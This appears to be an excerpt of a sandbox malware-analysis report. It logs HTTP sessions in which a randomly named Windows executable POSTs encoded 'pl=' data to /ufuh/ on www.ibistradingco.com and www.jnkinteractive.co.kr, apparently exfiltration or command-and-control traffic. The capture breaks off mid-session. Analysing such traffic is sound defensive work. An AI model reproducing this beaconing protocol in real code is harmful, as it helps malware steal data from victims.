                                                                                            28192.168.2.2249192154.41.250.58802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:14.084063053 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ibistradingco.com
                                                                                            Origin: http://www.ibistradingco.com
                                                                                            Referer: http://www.ibistradingco.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 73 65 78 33 33 46 31 2b 79 4d 4a 67 4e 46 77 73 56 44 58 58 63 30 50 48 77 62 56 75 32 6e 7a 4b 4e 56 33 38 6f 78 52 37 58 69 36 6e 50 69 30 6f 59 47 62 7a 31 6d 48 71 75 5a 43 59 54 48 63 33 2b 4d 6a 45 56 38 79 33 78 76 54 53 6f 73 6f 49 44 50 4a 50 52 37 59 31 6f 69 38 68 72 70 77 75 71 4e 71 62 6b 59 69 6c 4f 49 74 48 33 79 64 4d 58 4f 35 63 64 66 4a 4b 47 68 50 35 51 35 64 50 78 62 56 31 2b 2b 4b 4f 4e 37 6d 4d 51 4d 57 69 4b 7a 71 77 48 48 70 68 6f 71 73 77 67 59 44 6d 31 6c 2f 74 49 46 66 31 52 7a 68 2f 59 69 70 64 45 63 69 6b 30 75 74 30 78 37 79 68 68 6f 67 44 77 67 72 61 52 42 67 6b 4a 42 30 54 75 7a 48 69 62 36 52 6f 52 67 4b 56 78 35 2f 57 72 59 6b 70 47 66 43 63 4a 44 48 32 75 35 72 46 64 52 36 56 4a 6a 33 37 45 68 52 63 6a 6a 64 37 74 5a 36 4a 45 33 39 4c 6e 38 47 73 38 69 33 48 34 4b 77 75 50 49 56 46 62 56 78 50 63 43 51 2b 35 58 45 2b 58 35 69 42 43 75 62 41 4b 51 70 74 77 6a 38 73 65 49 45 4b 50 4b 71 76 64 31 51 4e 39 35 79 6c 43 33 79 78 38 6e 32 2f 76 6c 4d 35 50 56 33 [TRUNCATED]
                                                                                            Data Ascii: pl=sex33F1+yMJgNFwsVDXXc0PHwbVu2nzKNV38oxR7Xi6nPi0oYGbz1mHquZCYTHc3+MjEV8y3xvTSosoIDPJPR7Y1oi8hrpwuqNqbkYilOItH3ydMXO5cdfJKGhP5Q5dPxbV1++KON7mMQMWiKzqwHHphoqswgYDm1l/tIFf1Rzh/YipdEcik0ut0x7yhhogDwgraRBgkJB0TuzHib6RoRgKVx5/WrYkpGfCcJDH2u5rFdR6VJj37EhRcjjd7tZ6JE39Ln8Gs8i3H4KwuPIVFbVxPcCQ+5XE+X5iBCubAKQptwj8seIEKPKqvd1QN95ylC3yx8n2/vlM5PV3Fsggs6Rm3z+SWfACIMISKevImb2gLeqcv3BLQF4yjzoSWQ+i1fdkeHnaqIOf6OBpoOHEulRWtztGqwQYUuJLv+UNa1k3eiB4SpPrtLIka6hBH6vUuCd8Xm9EogGCKWAFofDoUiEeSxPZTxMUj22UcDi92uO8dN8vl3NVxNOebOSiLsOkO7ZYtoW7lHs38FAzivXzd/ut8sVv/fsUVAn8f3nL6QfIMcjVM9PObn5lsqS07zh6k3YiZpRm6B9Gy/MoRXmPtV3XtyFaWftMbT8cQBQr5eAUwLabfo/TZtaZgAgoMEZmxqylsJ0QjZO58G9sslsHzFga/og4vzV08X+cwHxDzNKDVEkV/Gg00up3Q0FMxAp6CmmTsmiAuMvtvOlx3mBDWySDfZvlrmZTX4oKxG0yPw/DXgK62wz/q0PQDfrZryOdgPIZ2oHZ5n+2wNOmQPYQtzmvjybK7KouJrOzRQwEOCKnarOc6JA04NkQNRyUEHStBfJDSQNL93IEZTsexXyMvW2C/Dcd9ds3XX3Kac8sPqkz/43xjmIa69pQbf2MEJ7oVWPJiQJ62rz/GP5jCXmSh1HS7TwjdvUvYRZzEKht1rUNupi5bARSnuQqjWrBfVX3qKMcXxpfqPI08vD/HMjchkHBYw0ay9pWHV2sfO8s5L9hlZ2LV9 [TRUNCATED]
                                                                                            May 2, 2024 08:29:14.177433968 CEST1582OUTData Raw: 66 70 36 55 4d 37 66 51 31 33 37 5a 2b 59 79 65 46 64 62 59 46 62 4c 69 30 57 54 4f 4d 77 2b 74 57 42 36 4e 6e 70 4e 39 57 6d 70 51 6e 44 61 54 30 4e 38 63 70 73 61 70 50 6c 36 6a 30 48 79 43 74 7a 47 54 79 48 4f 57 7a 5a 7a 6f 50 58 75 66 6f 4a
                                                                                            Data Ascii: fp6UM7fQ137Z+YyeFdbYFbLi0WTOMw+tWB6NnpN9WmpQnDaT0N8cpsapPl6j0HyCtzGTyHOWzZzoPXufoJsG2tFciRmLvyhflpYnZ4YowM3Kx0CIDvx4tiKI29DSRCrhPnADOaC4yxs2I0r4rSrgt+9MR4B2wQx3/JU3bUBF2MXiBqRoe/VPUnwJFjWNvabwZRdBXDGxaswrwTOGnojKUKNGA+iWEfoOZIYVlNwDgZBDzlKjxH5
                                                                                            May 2, 2024 08:29:14.407983065 CEST1215INHTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:14 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: 1a31ccf64c83a1f6fc09f744dcc4345a-bos-edge1
                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                            x-hcdn-upstream-rt: 0.137
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.2249193154.41.250.58802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:16.698314905 CEST470OUTGET /ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.ibistradingco.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:16.926501989 CEST1289INHTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:16 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: 35ab4bcfd5b56cd95859fe76c1fcca66-bos-edge1
                                                                                            x-hcdn-cache-status: MISS
                                                                                            x-hcdn-upstream-rt: 0.132
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>
                                                                                            May 2, 2024 08:29:16.926553965 CEST72INData Raw: 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: The document has been permanently moved.</p></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.2249194183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:27.912276983 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            Origin: http://www.jnkinteractive.co.kr
                                                                                            Referer: http://www.jnkinteractive.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4a 5a 4b 78 62 51 54 58 56 47 71 65 42 57 2f 7a 41 62 47 61 36 37 6c 77 72 61 71 50 56 35 59 44 6f 59 6b 47 47 34 6b 57 6d 76 4c 42 4e 64 73 65 43 4c 49 4f 4f 41 4d 36 73 4f 4d 61 46 79 67 6a 48 62 4d 30 48 4b 6f 61 68 6f 4b 77 79 51 32 54 51 5a 47 74 74 51 43 53 4c 73 6c 4e 75 67 63 63 32 4f 44 4c 71 2b 61 6c 39 70 2f 4d 74 2b 65 33 4d 75 45 33 2f 36 5a 47 75 2b 52 4b 33 77 4e 78 47 50 2b 6e 38 4d 77 42 42 56 75 30 7a 57 2f 55 35 55 38 64 53 69 53 53 45 69 44 37 39 47 41 4b 44 4a 6e 65 53 2f 31 54 30 67 76 6d 32 56 72 70 34 72 6e 30 67 79 62 69 65 76 79 53 77 4d 44 4b 64 39 58 77 79 4d 51 64 45 44 73 51 42 54 32 79 4a 66 33 38 61 4e 31 4f 34 43 48 31 6b 54 36 59 63 42 53 44 62 43 77 43 36 73 41 73 4d 70 33 46 76 62 65 65 5a 5a 6d 52 58 6f 62 74 66 63 58 4d 4f 6f 57 58 54 69 57 52 68 44 4e 55 59 51 49 32 47 2f 6e 4d 6f 61 59 36 49 2b 43 58 57 52 51 73 32 6e 65 54 44 55 42 57 74 49 4b 62 67 6a 70 77 51 46 55 6f 6e 38 58 64 47 49 62 48 59 55 6a 4f 77 6c 36 61 55 72 4f 63 42 71 65 4e 37 55 69 [TRUNCATED]
                                                                                            Data Ascii: pl=JZKxbQTXVGqeBW/zAbGa67lwraqPV5YDoYkGG4kWmvLBNdseCLIOOAM6sOMaFygjHbM0HKoahoKwyQ2TQZGttQCSLslNugcc2ODLq+al9p/Mt+e3MuE3/6ZGu+RK3wNxGP+n8MwBBVu0zW/U5U8dSiSSEiD79GAKDJneS/1T0gvm2Vrp4rn0gybievySwMDKd9XwyMQdEDsQBT2yJf38aN1O4CH1kT6YcBSDbCwC6sAsMp3FvbeeZZmRXobtfcXMOoWXTiWRhDNUYQI2G/nMoaY6I+CXWRQs2neTDUBWtIKbgjpwQFUon8XdGIbHYUjOwl6aUrOcBqeN7Uip7kUz0bOLvO00n115+7cE3KfRCiUSOX64AxT+d/gzbWDyVSokiva2yv8go1dVRTInP4Q/OnbX3y/QZbnF9RkKElXak/nv1tW16TWmSS5ctUP25Lu3IpQl9UHJwxlMdGcDKlU4cKMfq2M7YANJlglH+T9BFQFZ59MwUskpZbzN7/Ti5EQURAvZjq4qzq925ArnnYQ+QZBhweKtoKoXrp40ym3DBz6deP63HkF5Rj9BHX9mLHHNpFK0z7s4mK+F8j3bsLfYgXxKhXoYFZWZVjGb0SpFhxwRYC8egdk6OhBU8KNs0J8Tj3tKjBbKnqsiwlu+uRMShXpKAJ1OR+KhGcWC2UQ8/axU2aH6v393twBZ5zljvGvBwDcdA9tcgRYIxBgEe0MyHCh6WWROtC3zrASwOX/XsSuLS2bMYt/AT6xP+hR7DZjtag4oCdHjdxLs2wzmkclJ3Oo0ZgygLT9Px7192NPP97eUD+ynkvy8vu39zSmzlDEgy+uub5vlD2MxODNxkwFK3Tp3yqJRY0YtC9/Iz3LHNy6YTrZoEYtOu+oULaJxpxKZ5FqBLcYYW7GOzvg9dQpAi77qmb4+5MMyIzGBLKWQLTB5Dzj1biOLjLSculbV+aVR3L7t6y7BUb+qCXXsE5tEScPTBh2FudIQVN1BOP7MpINAY/k4b [TRUNCATED]
                                                                                            May 2, 2024 08:29:28.189863920 CEST127OUTData Raw: 38 73 59 63 48 77 38 46 63 4f 64 78 66 31 75 30 65 63 71 2f 43 64 36 4e 33 38 4d 31 45 67 6d 4d 6c 45 73 58 39 45 42 33 45 32 73 47 30 34 44 71 64 48 67 32 36 58 47 6d 4c 32 31 50 69 2f 41 2f 58 69 5a 46 6a 57 46 65 61 71 67 6b 36 53 5a 35 71 2b
                                                                                            Data Ascii: 8sYcHw8FcOdxf1u0ecq/Cd6N38M1EgmMlEsX9EB3E2sG04DqdHg26XGmL21Pi/A/XiZFjWFeaqgk6SZ5q+XwoNWM77KFlSCj9z6A1a4MqpterbYxlNdv+v7nRLKBrIN
                                                                                            May 2, 2024 08:29:28.776334047 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 62 66 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 6f e3 c6 f9 5c ff 0a 8a 41 6d 32 4b 52 94 ec f5 ba 94 b9 8b c4 f1 16 6d 37 dd 60 1f 28 8a b5 11 8c c8 a1 34 36 c5 61 66 86 96 5d ae 80 a0 58 14 45 11 f4 92 16 cd 21 39 14 68 d1 4b 80 16 45 0f 39 04 fd 41 5d e7 3f f4 9b 21 25 52 22 15 af 1d 27 b0 41 72 66 be d7 7c ef 19 ed 77 de 7b 7c f0 ec d7 1f 1c 6a 63 31 89 ef 6f ec cb 97 16 a3 64 e4 eb a7 d4 fe c5 13 5d ce 61 14 de df f8 d1 fe 04 0b a4 05 63 c4 38 16 be fe fc d9 43 7b 4f d7 ba 8b 95 04 4d b0 af 9f 11 3c 4d 29 13 ba 16 d0 44 e0 04 20 a7 24 14 63 3f c4 67 24 c0 b6 1a 58 1a 49 88 20 28 b6 79 80 62 ec f7 14 9d 1a 99 2d 46 87 54 f0 ad 05 91 ad 09 3a b7 c9 04 8d b0 9d 32 2c 99 78 31 62 23 bc a5 10 05 11 31 be ff cd 1f 3f bb fc e2 3f 97 ff f8 f8 f5 df bf d6 2e ff f5 df cb 2f 5e 69 97 bf ff 4c bb fc cb ef 2e bf f8 44 db 7c 6b af df eb 0d b4 d7 ff fc ea f2 b7 5f 6a 97 7f 7e f5 fa d5 97 af ff fa b9 76 f9 87 bf 5d 7e fe ea f2 df 5f ed 77 0b 42 1b fb 31 49 4e 35 86 63 7f 2b 4c b8 e4 18 61 11 8c b7 b4 31 [TRUNCATED]
                                                                                            Data Ascii: bfbKo\Am2KRm7`(46af]XE!9hKE9A]?!%R"'Arf|w{|jc1od]ac8C{OM<M)D $c?g$XI (yb-FT:2,x1b#1??./^iL.D|k_j~v]~_wB1IN5c+La1|[IrJ@0AP\3YQ$$4&&]IKRF__m2:?\/xc!R0,O>W_G,PT$Si'<Bd5_!9u$=FG]F3|UG:Q^^[:>lt3z _rL3`upqPB++m8NS$AWa3!sa:;>6owgcX7G8N%A-<k\&ggaK|Ija9CqG9p9y*(}9D~6pz$0i@!XSxH@Up-1JCph,L]pR>oa]L ;zN|;(0,2h>3/8HtG1^(GY3Qw^1.
                                                                                            May 2, 2024 08:29:28.776361942 CEST1289INData Raw: 0f 3a 3d af b3 4c 36 8c 50 ed 7b 5b 5f 5d 2a 88 d4 00 cc cd cd ce aa 64 3b f0 1c ee b8 f0 0c 76 ef d5 be fb b5 ef bb b5 6f dc 0e 7f 6f 65 27 3b 0b f6 35 e0 95 99 7e 63 e6 6e 63 06 5f 4d 07 58 9b 03 65 82 32 3b 14 36 a8 ed 54 ca 8c a3 5e 4d bc e1
                                                                                            Data Ascii: :=L6P{[_]*d;vooe';5~cnc_MXe2;6T^M~muu<&{(Yh$e+N1iL(~onrG@HV2GdzZ!XC/@7-34gnS'<dLr$`yPMu9]j
                                                                                            May 2, 2024 08:29:28.776386023 CEST878INData Raw: 57 c9 d4 6a ae ee 56 80 a6 18 5f 41 4d 1e 97 80 fd 32 b9 71 cf 19 23 6e 57 d1 67 8d fb 8d 99 ed c6 cc 4e 63 e6 6e 63 66 77 65 26 4f e1 00 24 f7 df 73 fa 77 f1 44 eb 3b db f7 e0 3d 2b 45 50 8a 2f b2 65 8c 23 f1 42 ed e0 6d 7f 0a 5e 2a a5 9e d0 10
                                                                                            Data Ascii: WjV_AM2q#nWgNcncfwe&O$swD;=+EP/e#Bm^*Fi50YpEPj@$PM%tn*[A@:7(gT@yAU,gO\gxBeb_j-WBFS;Ef$@e "I]*=g
                                                                                            May 2, 2024 08:29:28.776540995 CEST1289INData Raw: 65 34 64 0d 0a bc 5c 6d 6f e3 36 12 fe dc fe 0a 21 c1 a1 d1 1e 6d 48 94 2c cb 0e ee 70 68 8b c5 f5 c3 de 1d 6e d1 4f 87 c5 42 b6 e4 d8 a8 13 1b 7e d9 24 35 f2 df 6f 66 48 4a 14 45 bd 58 4a bb bb c9 da d4 cc 33 43 8a 9a 19 0e 87 2a c7 23 a2 e8 84
                                                                                            Data Ascii: e4d\mo6!mH,phnOB~$5ofHJEXJ3C*#x6(fD\;phRFrH`.gW0Z.;V.3U" j(]h!9v~ |Y$;L7].{{!*Mpom{-0
                                                                                            May 2, 2024 08:29:28.776597977 CEST1289INData Raw: d9 cf 1f 3f f2 1a aa bc de 0c e8 82 70 f2 53 1d da 09 13 28 82 ec 63 84 7f 0d b2 3c c8 ae 2c de f2 f5 9c ea 7f 4d c0 0d 6b f7 e4 2e 62 7e 38 85 c5 fb 94 f9 ae 03 0b 2a 68 bc f3 27 13 06 81 38 e7 a1 8b fb 09 10 ad d4 89 36 27 48 21 5b 9f 05 f5 f2
                                                                                            Data Ascii: ?pS(c<,Mk.b~8*h'86'H![0w{{1UeF5OG0&+'dUh,_%{SFM+Upx3Sh26i(99C}8?6 +9ou>xc`BjCfm u``
                                                                                            May 2, 2024 08:29:28.776669979 CEST1090INData Raw: e4 f6 40 3e 8e e5 66 52 98 b7 82 8b 4d e9 92 5d b1 c2 f3 62 40 74 01 5e 0b bc dc 22 af 18 17 bd f8 ad 6a 66 f4 ab 15 7c ed 1e fe 61 43 64 93 f1 fe 23 65 93 f2 87 0f 58 c9 8d e6 83 e7 6a df 85 87 37 fd 25 ee e6 a9 cd b3 aa bb b7 c5 f4 ee fd 1f d7
                                                                                            Data Ascii: @>fRM]b@t^"jf|aCd#eXj7%.: \|^}i# {|rVNXZBfT_B}ouNt{}^E61*/+K7p+A%P],^1[5xk=F'V9uv;
                                                                                            May 2, 2024 08:29:28.777450085 CEST1289INData Raw: 38 66 63 0d 0a ec 5d eb 8b dc 54 14 ff bc 03 fd 1f 2e 57 64 15 9a 64 92 79 ed d6 9d 51 ab 2d 14 5b 2a 15 f5 83 4a c9 24 99 dd b4 99 49 4c 32 9d ae b2 20 5a 44 2d 08 82 a2 1f aa 28 28 2a 0a 8a 54 e8 07 f1 0f 72 c6 ff c1 73 ce bd 79 4e e6 b5 6c dd
                                                                                            Data Ascii: 8fc]T.WddyQ-[*J$IL2 ZD-((*TrsyNlLr{WS@IOr"/3h<TLH>C_/B>OU@PLZ+*auBhg:n]Q}djv6_+dLaLz%M9%H1is4Kl;H
                                                                                            May 2, 2024 08:29:28.777481079 CEST1018INData Raw: d3 e4 47 47 47 db c0 42 6f 4f 7a b1 23 9e a1 b3 04 7e 30 0e ba 1c 1f 15 c5 8a 4c 7f fc 74 fa e1 7d 36 fb fc fe 5f 0f 7e e5 73 ad 25 e3 f7 fa f5 4c 71 39 89 fa c0 3b 2b 4a 03 44 87 06 cb ad 9b 30 65 27 73 f6 91 8a d5 57 33 5a 2a e6 ba e2 8c c6 57
                                                                                            Data Ascii: GGGBoOz#~0Lt}6_~s%Lq9;+JD0e'sW3Z*WGaB^~9h1sd{xA$T>.7>q}{tk2v5.4ow9{6*k">ZDprh#\e2vyGmcVN/O'vjZ(R+mC#B{vFp
                                                                                            May 2, 2024 08:29:28.784166098 CEST667INData Raw: 32 39 34 0d 0a 8c 5d bd 72 d3 40 10 ae e3 a7 58 44 21 39 c8 92 6d 60 06 c7 03 05 84 01 33 06 8a b8 8b 32 8c 1c 9f 13 19 23 27 ba 33 26 24 99 49 43 4f 41 41 c9 23 a4 a4 e1 85 20 bc 03 df ae 14 59 96 95 0c 8d e5 3b ed dd ed b7 7f b7 37 da 91 f2 c7
                                                                                            Data Ascii: 294]r@XD!9m`32#'3&$ICOAA# Y;7+h56c@}PDXF8nysdiC6MuTGCL_a2=!)c)0mhHaa(Sf1}#Qfy0^(outEoxP!
                                                                                            May 2, 2024 08:29:28.784192085 CEST20INData Raw: 61 0d 0a 03 00 4d c4 a4 e3 5f a2 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: aM_0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            31192.168.2.2249195183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:30.726321936 CEST744OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            Origin: http://www.jnkinteractive.co.kr
                                                                                            Referer: http://www.jnkinteractive.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4a 5a 4b 78 62 51 54 58 56 47 71 65 42 56 37 7a 41 4b 47 61 67 62 6c 77 71 61 71 50 48 35 59 46 6f 59 70 78 47 38 64 54 6d 39 72 42 4e 4d 63 65 44 34 77 4f 4a 41 4d 37 6d 75 4e 54 42 79 68 2b 48 62 4d 43 48 49 73 61 68 6f 65 77 7a 79 2b 54 42 4d 71 71 6b 41 43 63 47 4d 6c 4d 75 67 51 47 32 4f 50 62 71 2f 79 6c 39 72 72 4d 2f 76 69 33 4a 4e 73 33 36 4b 5a 45 6e 65 52 6e 33 77 42 6b 47 4c 53 76 38 4a 30 42 41 6b 69 30 79 47 66 55 76 55 41 64 63 43 53 54 4b 43 43 4d 38 55 39 46 4e 61 33 6e 57 5a 74 78 30 69 37 66 39 48 7a 55 34 64 61 2b 32 54 62 77 58 34 33 53 79 2b 4b 47 4f 41 3d 3d
                                                                                            Data Ascii: pl=JZKxbQTXVGqeBV7zAKGagblwqaqPH5YFoYpxG8dTm9rBNMceD4wOJAM7muNTByh+HbMCHIsahoewzy+TBMqqkACcGMlMugQG2OPbq/yl9rrM/vi3JNs36KZEneRn3wBkGLSv8J0BAki0yGfUvUAdcCSTKCCM8U9FNa3nWZtx0i7f9HzU4da+2TbwX43Sy+KGOA==
                                                                                            May 2, 2024 08:29:31.296595097 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
